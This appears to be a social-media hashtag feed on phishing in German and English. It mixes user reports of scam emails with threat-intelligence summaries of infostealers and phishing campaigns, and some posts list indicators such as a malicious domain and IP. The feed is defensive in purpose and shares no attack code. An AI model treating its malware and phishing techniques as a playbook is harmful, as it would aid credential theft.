Ok, das ist selbst mir neu... #Phishing zu einem selbstgehosteten #Email #Server. #Roundcube #Yunohost #OpenSource
Frühere Suchanfragen
Suchoptionen
#phishing
44 Beiträge30 Beteiligte1 Beitrag heute
Last week I posted a thread about a #spam campaign delivering a #ConnectWise client as its payload. As of this morning, the threat actors have changed the payload (https://www.virustotal.com/gui/file/30e1d059262b851a2b432ec856aeba5bb639ba764aa85643703163d62000a2f4) and it appears to try to connect to the address "relay.noscreener[.]info" which resolves to 104.194.145.66.
Embedded in the installer .msi file is a file called system.config, which contains this domain name and a base64-encoded string.
The fake Social Security website is still being hosted on a compromised site that belongs to a temp agency based on the east coast of the US.
Previous thread:
#Phishing: Angebliche Rückerstattung im Namen der #AOK: https://verbraucherzentrale.nrw/phishing
Detailed Analysis of DocSwap Malware Disguised as Security Document Viewer
A new malware called DocSwap, disguised as a document viewing authentication app, was discovered targeting South Korean mobile users. The malware, linked to a North Korean APT group, performs keylogging and information theft through accessibility services. It decrypts an obfuscated APK file, executes code from a DEX file, and communicates with a C2 server to receive malicious commands. The malware requests extensive permissions, maintains persistence, and performs various malicious activities including camera manipulation and audio recording. The C2 infrastructure initially displayed a phishing page impersonating CoinSwap, later showing characteristics associated with the Kimsuky group. The threat actor has been designated as puNK-004 by S2W TALON.
Pulse ID: 67faa88ecf8cad21f1b6a246
Pulse Link: https://otx.alienvault.com/pulse/67faa88ecf8cad21f1b6a246
Pulse Author: AlienVault
Created: 2025-04-12 17:53:18
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
A Deep Dive into Strela Stealer and how it Targets European Countries
Strela Stealer, an infostealer targeting email clients in specific European countries, has been active since late 2022. It focuses on exfiltrating credentials from Mozilla Thunderbird and Microsoft Outlook. The malware is delivered through phishing campaigns, primarily targeting Spain, Italy, Germany, and Ukraine. Recent attacks involve forwarding legitimate emails with malicious attachments. Strela Stealer employs multi-layer obfuscation and code-flow flattening to complicate analysis. The malware verifies the system's locale before executing, targeting specific German-speaking countries. It searches for email client profile data, encrypts it, and exfiltrates it to a command-and-control server. The infrastructure is linked to Russian bulletproof hosting providers, suggesting potential ties to Russian threat actors.
Pulse ID: 67fb93e88bf6ed070ce7164a
Pulse Link: https://otx.alienvault.com/pulse/67fb93e88bf6ed070ce7164a
Pulse Author: AlienVault
Created: 2025-04-13 10:37:28
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware
A phishing campaign targeting organizations in the hospitality industry has been identified, impersonating Booking.com and using the ClickFix social engineering technique to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, targets individuals likely to work with Booking.com in North America, Oceania, Asia, and Europe. The attack uses fake emails and webpages to trick users into executing malicious commands, leading to the download of various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. The campaign aims to steal financial data and credentials for fraudulent use, showing an evolution in the threat actor's tactics to bypass conventional security measures.
Pulse ID: 67fb93e8ebc93d6ded395f39
Pulse Link: https://otx.alienvault.com/pulse/67fb93e8ebc93d6ded395f39
Pulse Author: AlienVault
Created: 2025-04-13 10:37:28
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
I'm as sure as I can be that I've had a phishing attempt from two hotels that I've booked for my Slovakia trip in September.
Both hotels are in the same group. Identical emails but also identical messages within the booking.com messaging system.
They want me to reconfirm my credit card details - hmmmm!
I've emailed the hotels directly and also messaged booking.com
Maybe this is yet another argument for booking direct with the hotels rather than using a booking agent.
Massive Surge in SVG Based Phishing
A new breed of phishing attacks is targeting web users using image files as delivery vehicles, according to a new report from Trustwave SpiderLabs and the firm that co-founded the security firm.
Pulse ID: 67fbb96ccb2b2cd5801ad78b
Pulse Link: https://otx.alienvault.com/pulse/67fbb96ccb2b2cd5801ad78b
Pulse Author: cryptocti
Created: 2025-04-13 13:17:32
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
Also jetzt hab ich doch echt kurz überlegt, ob das wirklich sein kann, dass ich 1,95 Euro zahlen soll, damit mir weiterhin E-Mails zugestellt werden... und wollte mich schon aufregen, dass man als zahlender Kunde nun auch noch extra zahlen muss und so. 
Aber gut gemacht ist diese Spam-Mail ja...
Wie bekommt man denn #Hetzner dazu, die #Phishing Maildomains und Webseiten abzuschalten? Die Antworten, die ich von abuse@ bekomme, sind nicht besonders erfolgversprechend - sie würden gerne meine Reports an den Kunden weitergeben, was natürlich überhaupt nicht geht, denn der ist ja der Kriminelle selbst. Gibt es eine bayerische Internetpolizeiwache, die Anzeigen zu dem Thema aufnimmt und nicht nur zu Online-Auktionsbetrug und Straftaten mit Fahrrädern oder Kraftfahrzeugen aufnimmt?
https://www.europesays.com/1987931/ The Critical Need for Cybersecurity #AntiPhishingTraining #cryptolocker #europe #Florida #hackers #Hacking #KevinMitnick #knowbe4 #OnLineTraining #PhishProne #phishing #ransomware #SecurityAwarenessTraining #SocialEngineering #SpearPhishing #StuSjouwerman #TampaBay #training
Wenn man wieder Phishing-Domains shopt und man dann doch die 18€ nicht ausgeben will weil man nur die von #Hochwertziel-Orgs sammelt. 
#fdp #phishing
A technical overview on phishing infrastructure and considerations for Red Teaming
xbz0n.shSocial Engineering in Red Team Operations: Technical Setup and ToolsLet's talk about social engineering and OSINT in modern red team operations. Despite all the fancy security tech out there, humans still make decisions based...
Unraveling the U.S. toll road smishing scams
A widespread financial theft SMS phishing campaign targeting toll road users across multiple U.S. states has been observed since October 2024. The attacks impersonate automatic payment services like E-ZPass, claiming outstanding bills under $5 USD and warning of late fees. Victims are directed to spoofed domains where they are prompted to enter personal and credit card information. The campaign is believed to be carried out by multiple financially motivated threat actors using a smishing kit developed by 'Wang Duo Yu'. The kit's developer offers tutorials and services through Telegram channels and a YouTube channel. The ongoing campaign has targeted at least eight states, including Washington, Florida, Pennsylvania, and Texas, using typosquatted domains resolving to specific IP addresses.
Pulse ID: 67f88c2dc5d8b3383f8d9c72
Pulse Link: https://otx.alienvault.com/pulse/67f88c2dc5d8b3383f8d9c72
Pulse Author: AlienVault
Created: 2025-04-11 03:27:41
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
Aktuelles #Phishing: Vermeintlich notwendige Verifizierung der Telefonnummer bei Neobank #N26: https://www.verbraucherzentrale.nrw/phishing
Antwortete Andrew 
Brandt 
Brandt 
Reminds me to not check email.
How to identify a #phishing attack
https://bitwarden.com/blog/what-is-a-common-indicator-of-phishing/
BitwardenHow to identify a phishing attack | BitwardenDiscover what a common indicator of a phishing attempt looks like and learn how to protect yourself and your business. The Bitwarden blog provides essential tips and best practices to identify and avoid phishing scams.
#Phishing kits now vet victims in real-time before stealing credentials